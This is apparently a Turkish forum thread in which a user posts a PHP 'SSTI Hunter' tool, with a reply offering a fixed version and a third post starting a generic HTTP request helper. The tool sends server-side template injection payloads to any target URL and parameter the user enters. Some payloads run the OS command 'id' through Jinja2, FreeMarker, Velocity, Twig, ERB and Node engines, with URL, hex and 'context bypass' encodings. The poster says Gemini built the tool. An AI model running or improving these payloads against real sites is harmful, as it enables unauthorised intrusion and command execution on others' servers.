<?php
/**
* SSTI Hunter v43.0 - pwdec "THE ABSOLUTE OVERLORD: FINAL SINGULARITY"
* Mimari: Multi-Method Atomic Scan & Full Context Bypass
* Platform: cPanel, XAMPP, Localhost Optimized
*/
// Report every PHP diagnostic and print it into the response. On a reachable host this
// also shows file paths and warnings to whoever loads the page.
error_reporting(E_ALL);
ini_set('display_errors', '1');

// All HTTP traffic below goes through the cURL extension; stop early when it is absent.
if (!extension_loaded('curl')) {
    die("CRITICAL: CURL is missing!");
}

// No execution-time ceiling and a 2 GB memory ceiling: one submitted form can keep a
// PHP worker busy for as long as the whole run takes.
ini_set('memory_limit', '2G');
set_time_limit(0);
/**
 * Static holder for the probe strings and their encoded variants.
 *
 * Detection note: the literal fragments listed here (arithmetic such as 7*7 wrapped in
 * template delimiters, __subclasses__, java.lang.Runtime, freemarker.template.utility.Execute,
 * registerUndefinedFilterCallback, child_process) are what this tool puts into request
 * parameters, so they are the strings to look for in access logs and WAF rules.
 */
class FinalSingularity {
/**
 * Return the probe catalogue: category label => list of template-expression strings.
 *
 * The first group only evaluates 7*7 in different delimiter styles. The remaining groups
 * dump configuration or internal objects, or try to run the OS command `id`.
 *
 * @param string $w Webhook URL from the form. It is right-trimmed of "/" and then never
 *                  used, so the "Webhook (OOB)" field has no effect on what is sent.
 * @return array
 */
public static function getDatabase($w = "") {
$w = rtrim($w, '/');
// All the "bullets" (probe strings) are here; none were removed.
// Several literals are split with "." concatenation. The resulting value is the same as the
// unsplit string, but the contiguous token does not appear in this file's source.
return [
"Delimiters & Basics" => ['{{7*7}}', '${7*7}', '{7*7}', '[% 7*7 %]', '{@7*7}', '{# 7*7 #}', '{% 7*7 %}', '<' . '%= 7*7 %>', '<' . '% 7*7 %>', '[[7*7]]', '@@(7*7)', '{{= 7*7 }}', '[# 7*7 #]'],
"Python (Jinja2/Mako/Django)" => [
'{{' . 'config.items()}}', '{{' . 'self.__dict__}}',
'{{' . '().__class__.__mro__[1].__subclasses__()[396](\'id\',shell=True,stdout=-1).communicate()[0].decode()}}',
'${' . 'next(c for c in ().__class__.__base__.__subclasses__() if c.__name__ == "CatchWarnings").__init__.__globals__["sys"].modules["os"].popen("id").read()}'
],
"Java (EL/FreeMarker/Velocity)" => [
'${' . 'T(java.lang.Runtime).getRuntime().exec(\'id\')}',
'${' . '"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("").exec("id")}',
'<#assign ex="freemarker.template.utility.Execute"?new()>${ex(\'id\')}',
'#set($str="exp")#set($exec=$str.class.forName("java.lang.Runtime").getRuntime().exec("id"))'
],
"PHP (Twig/Smarty/Blade)" => [
'{{' . 'dump(app)}}', '{{' . '["id"]|filter("system")}}',
'{{' . '_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}',
'{' . 'smarty.template_vars}'
],
"Ruby & JS (ERB/EJS/Slim)" => [
'<' . '%= `id` %>', '<' . '%= IO.popen(\'id\').read %>', '<' . '%- 7*7 %>',
'{{' . 'constructor.constructor(\'return process\')().mainModule.require(\'child_process\').execSync(\'id\')}}'
],
"Others (Go/Rust/Razor)" => ['@Model.Value', '@(7*7)', '{{ . }}', '[[ 7*7 ]]', '{{7*7}}']
];
}
/**
 * Build the variants of one probe string that will each be sent as a separate request.
 *
 * @param string $p    One probe string from getDatabase().
 * @param array  $opts Option names selected in the form ('url', 'double', 'hex', 'uni', 'dec', 'ctx').
 *                     The form in this file has no checkbox with the value 'uni'.
 * @return array Variant label => string; 'Raw' (the unmodified input) is always present.
 */
public static function applyMatrix($p, $opts) {
$m = ['Raw' => $p];
// Single and double URL-encoding of the whole string.
if (in_array('url', $opts)) $m['URL'] = urlencode($p);
if (in_array('double', $opts)) $m['D-URL'] = urlencode(urlencode($p));
// Byte-wise re-encodings: percent-hex, \u00XX and a comma-separated list of decimal byte values.
if (in_array('hex', $opts)) { $h = ''; for($i=0;$i<strlen($p);$i++) $h .= '%' . dechex(ord($p[$i])); $m['Hex'] = $h; }
if (in_array('uni', $opts)) { $u = ''; for($i=0;$i<strlen($p);$i++) $u .= '\\u00' . dechex(ord($p[$i])); $m['Unicode'] = $u; }
if (in_array('dec', $opts)) { $d = ''; for($i=0;$i<strlen($p);$i++) $d .= ord($p[$i]) . ','; $m['Decimal'] = rtrim($d, ','); }
// "Context" variants wrap the probe in a closing quote or closing tag on one side and a comment or opening tag on the other.
if (in_array('ctx', $opts)) { $m['Ctx_SQ'] = "';" . $p . ";//"; $m['Ctx_DQ'] = "\";" . $p . ";//"; $m['Ctx_Tag'] = "}}" . $p . "{{"; }
return $m;
}
}
// Rows for the results table and the counters shown in the stats bar.
$results = [];
$stats = ['total' => 0, 'vuln' => 0, 'start' => microtime(true)];
// NOTE(review): no login, CSRF token or target allow-list is visible in this file. Whoever can
// reach the page can make this server send the requests below to any URL they type in, so
// the host itself becomes a request relay.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['launch'])) {
// Every value is taken from the form as-is; none is validated before it is used.
$target = $_POST['url'];
$params = array_filter(array_map('trim', explode(',', $_POST['params'])));
$webhook = $_POST['webhook'] ?? "";
$opts = $_POST['opts'] ?? ['url'];
$method = $_POST['method'];
$cookies = $_POST['cookies'] ?? "";
$headers = array_filter(array_map('trim', explode("\n", $_POST['headers'])));
$only_vuln = isset($_POST['only_vuln']);
$db = FinalSingularity::getDatabase($webhook);
// One request per (parameter, probe string, variant), sent one after another from this server.
// In the target's access log this is a burst from a single source that repeats the same
// parameter names with template delimiters in the values.
foreach ($params as $pr) {
foreach ($db as $cat => $list) {
foreach ($list as $raw) {
$vars = FinalSingularity::applyMatrix($raw, $opts);
foreach ($vars as $mode => $final) {
$stats['total']++;
$ch = curl_init();
$payload_data = ["$pr" => $final];
$url = $target;
if ($method === 'GET') {
$url .= (strpos($url, '?') ? '&' : '?') . http_build_query($payload_data);
} else {
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload_data));
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
}
// CURLOPT_SSL_VERIFYPEER => 0 turns certificate verification off, so the response that gets
// scored below is not guaranteed to come from the named host.
$curl_configs = [
CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 15,
CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_HEADER => 1, CURLOPT_COOKIE => $cookies
];
if ($headers) $curl_configs[CURLOPT_HTTPHEADER] = array_merge($curl_configs[CURLOPT_HTTPHEADER] ?? [], $headers);
curl_setopt_array($ch, $curl_configs);
// A failed transfer (curl_exec() returning false) becomes an empty string through the cast.
$resp = (string)curl_exec($ch);
$info = curl_getinfo($ch);
curl_close($ch);
// CURLOPT_HEADER is on, so the header block is cut off before the body is inspected.
$body = substr($resp, $info['header_size']);
// A response counts as a hit when its body contains any of these substrings. The bare "49"
// alternative matches any page that happens to contain those two digits (prices, ids,
// timestamps), so the "VULNS FOUND" counter overstates and each hit needs manual confirmation.
$v = preg_match('/49|uid=|root:|etc\/passwd|TemplateRuntimeError/i', $body);
if ($v) $stats['vuln']++;
if (!$only_vuln || $v) {
// 'u' holds the user-supplied target (or the target plus query string) and is printed in the table later.
$results[] = [
'p' => $pr, 'cat' => $cat, 'm' => $mode, 'pld' => $final,
'st' => $info['http_code'], 'len' => strlen($body), 'v' => $v, 'u' => ($method === 'GET' ? $url : $target)
];
}
// Pause 250 ms after an HTTP 500 before sending the next request.
if ($info['http_code'] == 500) usleep(250000);
gc_collect_cycles();
}
}
}
}
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<title>SSTI Sovereign Final v43.0</title>
<style>
:root { --bg: #0d1117; --card: #161b22; --border: #30363d; --blue: #58a6ff; --neon: #39ff14; --text: #c9d1d9; --gray: #8b949e; }
body { background: var(--bg); color: var(--text); font-family: -apple-system, system-ui, sans-serif; padding: 20px; font-size: 13px; margin: 0; }
.box { background: var(--card); border: 1px solid var(--border); border-radius: 8px; padding: 25px; margin-bottom: 20px; box-shadow: 0 8px 24px rgba(0,0,0,0.5); }
h1 { color: var(--blue); font-size: 18px; border-bottom: 1px solid var(--border); padding-bottom: 15px; margin-top: 0; font-weight: 600; text-transform: uppercase; }
input, select, textarea { background: #0d1117; border: 1px solid var(--border); color: #fff; padding: 12px; border-radius: 6px; width: 100%; margin-bottom: 15px; outline: none; transition: 0.2s; }
input:focus { border-color: var(--blue); }
.checks { display: flex; gap: 15px; flex-wrap: wrap; margin-bottom: 15px; font-size: 11px; color: var(--gray); }
.btn { background: #238636; color: #fff; border: none; padding: 18px; width: 100%; border-radius: 6px; font-weight: 700; cursor: pointer; text-transform: uppercase; transition: 0.2s; }
.btn:hover { background: #2ea043; box-shadow: 0 0 20px rgba(57, 255, 20, 0.2); }
.stats-bar { display: grid; grid-template-columns: repeat(4, 1fr); gap: 15px; margin-bottom: 20px; }
.stat-item { background: var(--card); border: 1px solid var(--border); padding: 15px; border-radius: 8px; text-align: center; }
.stat-val { display: block; font-size: 20px; font-weight: 800; color: var(--blue); }
table { width: 100%; border-collapse: collapse; border: 1px solid var(--border); border-radius: 6px; overflow: hidden; }
th { background: #1b1f24; padding: 12px; text-align: left; color: var(--gray); font-size: 11px; }
td { padding: 10px; border-bottom: 1px solid var(--border); font-family: 'Consolas', monospace; font-size: 12px; }
.v-row { background: rgba(57, 255, 20, 0.1) !important; color: var(--neon); font-weight: bold; }
.action-btn { background: #21262d; border: 1px solid var(--border); color: var(--blue); padding: 5px 10px; border-radius: 4px; cursor: pointer; font-size: 11px; text-decoration: none; margin-right: 5px; }
</style>
</head>
<body>
<div class="box">
<h1>>> pwdec_SSTI_SOVEREIGN_v43.0</h1>
<form method="POST">
<div style="display:grid; grid-template-columns: 2fr 1fr; gap:15px;">
<div><label>Target URL</label><input type="text" name="url" placeholder="https://site.com/view" required></div>
<div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;">
<div><label>Params</label><input type="text" name="params" value="id,template,q" required></div>
<div><label>Method</label><select name="method"><option>GET</option><option>POST</option><option>PUT</option><option>DELETE</option></select></div>
</div>
</div>
<div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;">
<div><label>Cookies</label><input type="text" name="cookies" placeholder="session=xyz;"></div>
<div><label>Webhook (OOB)</label><input type="text" name="webhook" placeholder="https://webhook.site/..."></div>
</div>
<div class="checks">
<label><input type="checkbox" name="opts[]" value="url" checked> URL Enc</label>
<label><input type="checkbox" name="opts[]" value="double" checked> Double URL</label>
<label><input type="checkbox" name="opts[]" value="hex" checked> Hex</label>
<label><input type="checkbox" name="opts[]" value="dec" checked> Decimal Bypass</label>
<label><input type="checkbox" name="opts[]" value="ctx" checked> Context Bypass</label>
<label style="color:var(--blue)"><input type="checkbox" name="only_vuln" checked> Sadece Başarılılar</label>
</div>
<button type="submit" name="launch" class="btn">Execute Absolute Final Strike</button>
</form>
</div>
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
<div class="stats-bar">
<div class="stat-item"><span class="stat-val"><?= $stats['total'] ?></span><span style="font-size:10px; color:var(--gray);">TOTAL TESTS</span></div>
<div class="stat-item"><span class="stat-val" style="color:var(--neon)"><?= $stats['vuln'] ?></span><span style="font-size:10px; color:var(--gray);">VULNS FOUND</span></div>
<div class="stat-item"><span class="stat-val"><?= round(microtime(true) - $stats['start'], 2) ?>s</span><span style="font-size:10px; color:var(--gray);">DURATION</span></div>
<div class="stat-item"><span class="stat-val"><?= count($results) ?></span><span style="font-size:10px; color:var(--gray);">REPORTED</span></div>
</div>
<div class="box">
<table>
<thead><tr><th>Param</th><th>Engine</th><th>Mode</th><th>ST</th><th>Size</th><th>Payload</th><th>Actions</th></tr></thead>
<tbody>
<?php if (empty($results)) echo '<tr><td colspan="7" style="text-align:center; color:var(--gray);">Hiçbir bulgu yok.</td></tr>'; ?>
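<?php
// Single output encoder for the results table. Every cell and attribute value goes through
// it, including the category and mode labels ("Delimiters & Basics" contains a raw "&").
$esc = static function ($value): string {
    return htmlspecialchars((string)$value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};
?>
<?php foreach ($results as $r): ?>
<?php
// $r['u'] is the URL typed into the form. It is only turned into a link when it is an
// absolute http(s) URL, and it is attribute-escaped so it cannot close the href and add markup.
$href = preg_match('#^https?://#i', (string)$r['u']) === 1 ? $esc($r['u']) : '#';
?>
<tr class="<?= $r['v'] ? 'v-row' : '' ?>">
<td><?= $esc($r['p']) ?></td><td><?= $esc($r['cat']) ?></td><td><?= $esc($r['m']) ?></td>
<td><?= $esc($r['st']) ?></td><td><?= $esc($r['len']) ?> B</td>
<td style="max-width:250px; overflow:hidden; text-overflow:ellipsis; white-space:nowrap;"><?= $esc($r['pld']) ?></td>
<td>
<?php /* addslashes() escapes for a JS string, not for an HTML attribute: a double quote in the value
         still ended the onclick attribute. The value now sits in an escaped data attribute and
         the handler reads it from there. */ ?>
<button class="action-btn" data-payload="<?= $esc($r['pld']) ?>" onclick="navigator.clipboard.writeText(this.dataset.payload); alert('Kopyalandı!')">COPY</button>
<a href="<?= $href ?>" target="_blank" rel="noopener noreferrer" class="action-btn">GO</a>
</td>
</tr>
<?php endforeach; ?>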
</tbody>
</table>
</div>
<?php endif; ?>
</body>
</html> PHP Post Method Hk Sorum
- 07-04-2026, 22:34:14 Şöyle bir scriptim var arkadaşlar. Mantık şu: bir input alanı var, benim verdiğim listedekileri deniyor ve bana sonuçlar çıkartıyor. GET isteği olanlarda sorun yok ama POST isteği olanlarda timeout hatası alıyorum. Gemini v47 yaptı, hâlâ çalışmıyor; ChatGPT de illegal diyor.
- 07-04-2026, 22:40:16
<?php ini_set('display_errors', '1'); error_reporting(E_ALL); if (!extension_loaded('curl')) die("CRITICAL: CURL is missing!"); set_time_limit(0); ini_set('memory_limit', '2G'); class FinalSingularity { public static function getDatabase($w = "") { $w = rtrim($w, '/'); return [ "Delimiters & Basics" => ['{{7*7}}', '${7*7}', '{7*7}', '[% 7*7 %]', '{@7*7}', '{# 7*7 #}', '{% 7*7 %}', '<' . '%= 7*7 %>', '<' . '% 7*7 %>', '[[7*7]]', '@@(7*7)', '{{= 7*7 }}', '[# 7*7 #]'], "Python (Jinja2/Mako/Django)" => [ '{{' . 'config.items()}}', '{{' . 'self.__dict__}}', '{{' . '().__class__.__mro__[1].__subclasses__()[396](\'id\',shell=True,stdout=-1).communicate()[0].decode()}}', '${' . 'next(c for c in ().__class__.__base__.__subclasses__() if c.__name__ == "CatchWarnings").__init__.__globals__["sys"].modules["os"].popen("id").read()}' ], "Java (EL/FreeMarker/Velocity)" => [ '${' . 'T(java.lang.Runtime).getRuntime().exec(\'id\')}', '${' . '"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("").exec("id")}', '<#assign ex="freemarker.template.utility.Execute"?new()>${ex(\'id\')}', '#set($str="exp")#set($exec=$str.class.forName("java.lang.Runtime").getRuntime().exec("id"))' ], "PHP (Twig/Smarty/Blade)" => [ '{{' . 'dump(app)}}', '{{' . '["id"]|filter("system")}}', '{{' . '_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}', '{' . 'smarty.template_vars}' ], "Ruby & JS (ERB/EJS/Slim)" => [ '<' . '%= `id` %>', '<' . '%= IO.popen(\'id\').read %>', '<' . '%- 7*7 %>', '{{' . 'constructor.constructor(\'return process\')().mainModule.require(\'child_process\').execSync(\'id\')}}' ], "Others (Go/Rust/Razor)" => ['@Model.Value', '@(7*7)', '{{ . }}', '[[ 7*7 ]]', '{{7*7}}'] ]; } public static function applyMatrix($p, $opts) { $m = ['Raw' => $p]; if (in_array('url', $opts)) $m['URL'] = urlencode($p); if (in_array('double', $opts)) $m['D-URL'] = urlencode(urlencode($p)); if (in_array('hex', $opts)) { $h = ''; for($i=0;$i<strlen($p);$i++) $h .= '%' . 
dechex(ord($p[$i])); $m['Hex'] = $h; } if (in_array('uni', $opts)) { $u = ''; for($i=0;$i<strlen($p);$i++) $u .= '\\u00' . dechex(ord($p[$i])); $m['Unicode'] = $u; } if (in_array('dec', $opts)) { $d = ''; for($i=0;$i<strlen($p);$i++) $d .= ord($p[$i]) . ','; $m['Decimal'] = rtrim($d, ','); } if (in_array('ctx', $opts)) { $m['Ctx_SQ'] = "';" . $p . ";//"; $m['Ctx_DQ'] = "\";" . $p . ";//"; $m['Ctx_Tag'] = "}}" . $p . "{{"; } return $m; } } $results = []; $stats = ['total' => 0, 'vuln' => 0, 'start' => microtime(true)]; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['launch'])) { $target = $_POST['url']; $params = array_filter(array_map('trim', explode(',', $_POST['params']))); $webhook = $_POST['webhook'] ?? ""; $opts = $_POST['opts'] ?? ['url']; $method = $_POST['method']; $cookies = $_POST['cookies'] ?? ""; $headers = array_filter(array_map('trim', explode("\n", $_POST['headers']))); $only_vuln = isset($_POST['only_vuln']); $db = FinalSingularity::getDatabase($webhook); foreach ($params as $pr) { foreach ($db as $cat => $list) { foreach ($list as $raw) { $vars = FinalSingularity::applyMatrix($raw, $opts); foreach ($vars as $mode => $final) { $stats['total']++; $ch = curl_init(); $payload_data = ["$pr" => $final]; $url = $target; // ============ CURL BAŞLANGIÇ ============ // Header setup - TEK BİR SEFER $http_headers = ['Content-Type: application/x-www-form-urlencoded']; if (!empty($headers)) { $http_headers = array_merge($http_headers, $headers); } // URL setup if ($method === 'GET') { $url .= (strpos($url, '?') ? '&' : '?') . 
http_build_query($payload_data); } // CURL OPTIONS - HEPSİ BİRLİKTE $curl_opts = [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 8, CURLOPT_CONNECTTIMEOUT => 4, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_HEADER => 1, CURLOPT_COOKIE => $cookies, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_MAXREDIRS => 2, CURLOPT_NOSIGNAL => 1, CURLOPT_HTTPHEADER => $http_headers, CURLOPT_FAILONERROR => 0, CURLOPT_ENCODING => '', ]; // POST/PUT datası if ($method !== 'GET') { $post_fields = http_build_query($payload_data); $curl_opts[CURLOPT_POSTFIELDS] = $post_fields; if ($method === 'POST') { $curl_opts[CURLOPT_POST] = 1; } else { $curl_opts[CURLOPT_CUSTOMREQUEST] = $method; } } // Tüm curl ayarlarını bir kez set et curl_setopt_array($ch, $curl_opts); // İsteği yap $resp = @curl_exec($ch); $info = curl_getinfo($ch); curl_close($ch); // Timeout veya hata varsa atla if ($resp === false) { continue; } // Response parse $body = substr($resp, $info['header_size']); $v = preg_match('/49|uid=|root:|etc\/passwd|TemplateRuntimeError/i', $body); if ($v) $stats['vuln']++; // Sonuçları kaydet if (!$only_vuln || $v) { $results[] = [ 'p' => $pr, 'cat' => $cat, 'm' => $mode, 'pld' => $final, 'st' => $info['http_code'] ?? 0, 'len' => strlen($body), 'v' => $v, 'u' => ($method === 'GET' ? 
$url : $target) ]; } // Memory temizle gc_collect_cycles(); } } } } } ?> <!DOCTYPE html> <html lang="tr"> <head> <meta charset="UTF-8"> <title>SSTI Sovereign Final v43.0</title> <style> :root { --bg: #0d1117; --card: #161b22; --border: #30363d; --blue: #58a6ff; --neon: #39ff14; --text: #c9d1d9; --gray: #8b949e; } body { background: var(--bg); color: var(--text); font-family: -apple-system, system-ui, sans-serif; padding: 20px; font-size: 13px; margin: 0; } .box { background: var(--card); border: 1px solid var(--border); border-radius: 8px; padding: 25px; margin-bottom: 20px; box-shadow: 0 8px 24px rgba(0,0,0,0.5); } h1 { color: var(--blue); font-size: 18px; border-bottom: 1px solid var(--border); padding-bottom: 15px; margin-top: 0; font-weight: 600; text-transform: uppercase; } input, select, textarea { background: #0d1117; border: 1px solid var(--border); color: #fff; padding: 12px; border-radius: 6px; width: 100%; margin-bottom: 15px; outline: none; transition: 0.2s; } input:focus { border-color: var(--blue); } .checks { display: flex; gap: 15px; flex-wrap: wrap; margin-bottom: 15px; font-size: 11px; color: var(--gray); } .btn { background: #238636; color: #fff; border: none; padding: 18px; width: 100%; border-radius: 6px; font-weight: 700; cursor: pointer; text-transform: uppercase; transition: 0.2s; } .btn:hover { background: #2ea043; box-shadow: 0 0 20px rgba(57, 255, 20, 0.2); } .stats-bar { display: grid; grid-template-columns: repeat(4, 1fr); gap: 15px; margin-bottom: 20px; } .stat-item { background: var(--card); border: 1px solid var(--border); padding: 15px; border-radius: 8px; text-align: center; } .stat-val { display: block; font-size: 20px; font-weight: 800; color: var(--blue); } table { width: 100%; border-collapse: collapse; border: 1px solid var(--border); border-radius: 6px; overflow: hidden; } th { background: #1b1f24; padding: 12px; text-align: left; color: var(--gray); font-size: 11px; } td { padding: 10px; border-bottom: 1px solid 
var(--border); font-family: 'Consolas', monospace; font-size: 12px; } .v-row { background: rgba(57, 255, 20, 0.1) !important; color: var(--neon); font-weight: bold; } .action-btn { background: #21262d; border: 1px solid var(--border); color: var(--blue); padding: 5px 10px; border-radius: 4px; cursor: pointer; font-size: 11px; text-decoration: none; margin-right: 5px; } </style> </head> <body> <div class="box"> <h1>>> SSTI_HUNTER_FINAL_FIXED_v43</h1> <form method="POST"> <div style="display:grid; grid-template-columns: 2fr 1fr; gap:15px;"> <div><label>Target URL</label><input type="text" name="url" placeholder="https://site.com/view" required></div> <div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;"> <div><label>Params</label><input type="text" name="params" value="id,template,q" required></div> <div><label>Method</label><select name="method"><option>GET</option><option>POST</option><option>PUT</option><option>DELETE</option></select></div> </div> </div> <div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;"> <div><label>Cookies</label><input type="text" name="cookies" placeholder="session=xyz;"></div> <div><label>Webhook (OOB)</label><input type="text" name="webhook" placeholder="https://webhook.site/..."></div> </div> <div class="checks"> <label><input type="checkbox" name="opts[]" value="url" checked> URL Enc</label> <label><input type="checkbox" name="opts[]" value="double" checked> Double URL</label> <label><input type="checkbox" name="opts[]" value="hex" checked> Hex</label> <label><input type="checkbox" name="opts[]" value="dec" checked> Decimal Bypass</label> <label><input type="checkbox" name="opts[]" value="ctx" checked> Context Bypass</label> <label style="color:var(--blue)"><input type="checkbox" name="only_vuln" checked> Sadece Başarılılar</label> </div> <button type="submit" name="launch" class="btn">Execute Final Strike</button> </form> </div> <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?> <div class="stats-bar"> 
<div class="stat-item"><span class="stat-val"><?= $stats['total'] ?></span><span style="font-size:10px; color:var(--gray);">TOTAL TESTS</span></div> <div class="stat-item"><span class="stat-val" style="color:var(--neon)"><?= $stats['vuln'] ?></span><span style="font-size:10px; color:var(--gray);">VULNS FOUND</span></div> <div class="stat-item"><span class="stat-val"><?= round(microtime(true) - $stats['start'], 2) ?>s</span><span style="font-size:10px; color:var(--gray);">DURATION</span></div> <div class="stat-item"><span class="stat-val"><?= count($results) ?></span><span style="font-size:10px; color:var(--gray);">REPORTED</span></div> </div> <div class="box"> <table> <thead><tr><th>Param</th><th>Engine</th><th>Mode</th><th>ST</th><th>Size</th><th>Payload</th><th>Actions</th></tr></thead> <tbody> <?php if (empty($results)) echo '<tr><td colspan="7" style="text-align:center; color:var(--gray);">Hiçbir bulgu yok.</td></tr>'; ?> <?php foreach($results as $r): ?> <tr class="<?= $r['v'] ? 'v-row' : '' ?>"> <td><?= htmlspecialchars($r['p']) ?></td><td><?= $r['cat'] ?></td><td><?= $r['m'] ?></td> <td><?= $r['st'] ?></td><td><?= $r['len'] ?> B</td> <td style="max-width:250px; overflow:hidden; text-overflow:ellipsis; white-space:nowrap;"><?= htmlspecialchars($r['pld']) ?></td> <td> <button class="action-btn" onclick="navigator.clipboard.writeText('<?= addslashes($r['pld']) ?>'); alert('Kopyalandı!')">COPY</button> <a href="<?= $r['u'] ?>" target="_blank" class="action-btn">GO</a> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <?php endif; ?> </body> </html> - 07-04-2026, 22:49:36<?php
// Debug configuration: every PHP diagnostic is reported and printed into the page, so file
// paths and warnings are visible to anyone who can load it.
error_reporting(E_ALL);
ini_set('display_errors', '1');

// The tool is built on the cURL extension; stop with a plain message when it is missing.
extension_loaded('curl') || die('CRITICAL: CURL is missing!');

// Remove PHP's execution-time limit; the cURL timeouts set in sendRequest() still apply.
set_time_limit(0);
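/**
 * Escape a value for output inside HTML text or a quoted attribute.
 *
 * This page prints response headers and bodies fetched from arbitrary servers, so the input
 * is not guaranteed to be valid UTF-8. With ENT_QUOTES alone htmlspecialchars() returns an
 * empty string for such input and the response would silently disappear from the page.
 * ENT_SUBSTITUTE replaces the invalid bytes with U+FFFD instead.
 *
 * @param mixed $value Anything castable to string.
 * @return string HTML-safe text with both quote styles encoded.
 */
function h($value): string
{
    return htmlspecialchars((string)$value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}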
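/**
 * Split a textarea value into individual "Name: value" request-header lines.
 *
 * Blank lines and lines without a colon are dropped. Splitting on every CR/LF combination
 * also means no returned element can contain a line break, so one textarea line cannot
 * carry a second header into the outgoing request.
 *
 * @param string $raw Textarea content, one header per line.
 * @return array List of trimmed header lines.
 */
function parseHeaderLines(string $raw): array
{
    // The pattern needs real escape sequences. Written as /rn|r|n/ it splits on the letters
    // "r" and "n" and cuts header names such as "Content-Type" into pieces.
    $lines = preg_split('/\r\n|\r|\n/', $raw) ?: [];
    $headers = [];
    foreach ($lines as $line) {
        $line = trim($line);
        if ($line === '' || strpos($line, ':') === false) {
            continue;
        }
        $headers[] = $line;
    }
    return $headers;
}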
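/**
 * Parse "key=value" lines from a textarea into an associative array.
 *
 * Each non-empty line is split at its first "=". A line without "=" yields the key with an
 * empty value, lines whose key is empty are skipped, and a repeated key keeps its last value.
 *
 * @param string $raw Textarea content, one pair per line.
 * @return array Map of trimmed key => trimmed value.
 */
function parseFormLines(string $raw): array
{
    // The pattern needs real escape sequences. Written as /rn|r|n/ it splits on the letters
    // "r" and "n" instead of on line breaks and mangles every key and value containing them.
    $lines = preg_split('/\r\n|\r|\n/', $raw) ?: [];
    $data = [];
    foreach ($lines as $line) {
        $line = trim($line);
        if ($line === '') {
            continue;
        }
        $parts = explode('=', $line, 2);
        $key = trim($parts[0]);
        if ($key === '') {
            continue;
        }
        $data[$key] = isset($parts[1]) ? trim($parts[1]) : '';
    }
    return $data;
}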
/**
 * Tell whether a header with the given name is already in the list.
 *
 * A line matches when it starts with the name immediately followed by ":", compared
 * without regard to letter case.
 *
 * @param array  $headers Header lines in "Name: value" form.
 * @param string $needle  Header name without the colon.
 * @return bool
 */
function hasHeader(array $headers, string $needle): bool
{
    $prefix = $needle . ':';
    $prefixLength = strlen($prefix);
    foreach ($headers as $candidate) {
        if (strncasecmp($candidate, $prefix, $prefixLength) === 0) {
            return true;
        }
    }
    return false;
}
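/**
 * Send one HTTP(S) request described by a form-style array and return what came back.
 *
 * Recognised keys in $input: url, method, params (key=value lines), raw_body, cookies,
 * headers ("Name: value" lines), connect_timeout, timeout, verify_ssl.
 *
 * The page passes $_POST straight in, so every value is caller-controlled. Values that end
 * up in the request line or header section are checked before any network activity:
 *  - the transfer is limited to http and https, also across redirects, so the form cannot
 *    be used to read local files or speak other protocols from this server;
 *  - the method must consist of letters only and the cookie string must not contain line
 *    breaks, so neither can add extra header lines to the request.
 *
 * Certificate verification follows the verify_ssl flag, which is off unless the checkbox is
 * ticked. With it off, the response is not authenticated.
 *
 * @param array $input Form fields as described above.
 * @return array Keys: request_url, method, request_headers, request_body, errno, error,
 *               info (curl_getinfo() array), response_headers, response_body.
 * @throws InvalidArgumentException When the URL is empty or not http(s), or when the method
 *                                  or cookie value is malformed.
 */
function sendRequest(array $input): array
{
    $url = trim($input['url'] ?? '');
    $method = strtoupper(trim($input['method'] ?? 'GET'));
    $cookies = trim((string)($input['cookies'] ?? ''));

    if ($url === '') {
        throw new InvalidArgumentException('URL gerekli.');
    }
    // Reject an explicit non-HTTP scheme up front; CURLOPT_PROTOCOLS below is the backstop
    // for URLs that carry no scheme at all.
    if (
        preg_match('#^([a-z][a-z0-9+.\-]*)://#i', $url, $schemeMatch) === 1
        && !in_array(strtolower($schemeMatch[1]), ['http', 'https'], true)
    ) {
        throw new InvalidArgumentException('Yalnızca http ve https URL\'leri desteklenir.');
    }
    if (strpbrk($url, "\r\n") !== false) {
        throw new InvalidArgumentException('URL satır sonu içeremez.');
    }
    // The method is written into the request line as-is when it goes through CURLOPT_CUSTOMREQUEST.
    if (preg_match('/^[A-Z]+$/', $method) !== 1) {
        throw new InvalidArgumentException('Geçersiz HTTP metodu.');
    }
    // trim() only strips the ends; a line break in the middle would start a new header line.
    if (strpbrk($cookies, "\r\n") !== false) {
        throw new InvalidArgumentException('Cookie değeri satır sonu içeremez.');
    }

    $params = parseFormLines((string)($input['params'] ?? ''));
    $rawBody = (string)($input['raw_body'] ?? '');
    $headers = parseHeaderLines((string)($input['headers'] ?? ''));
    $connectTimeout = max(1, (int)($input['connect_timeout'] ?? 10));
    // The total timeout can never be shorter than the connect timeout.
    $timeout = max($connectTimeout, (int)($input['timeout'] ?? 30));
    $verifySsl = !empty($input['verify_ssl']);

    // Release the session lock, if any, so other requests of the same user are not blocked
    // while this one waits on the network.
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_write_close();
    }

    $bodyString = '';
    $requestUrl = $url;
    if ($method === 'GET') {
        // GET carries the parameters in the query string and never has a body.
        if (!empty($params)) {
            $query = http_build_query($params);
            $requestUrl .= (strpos($requestUrl, '?') !== false ? '&' : '?') . $query;
        }
    } elseif ($rawBody !== '') {
        // A raw body wins over the key=value parameters and is sent untouched.
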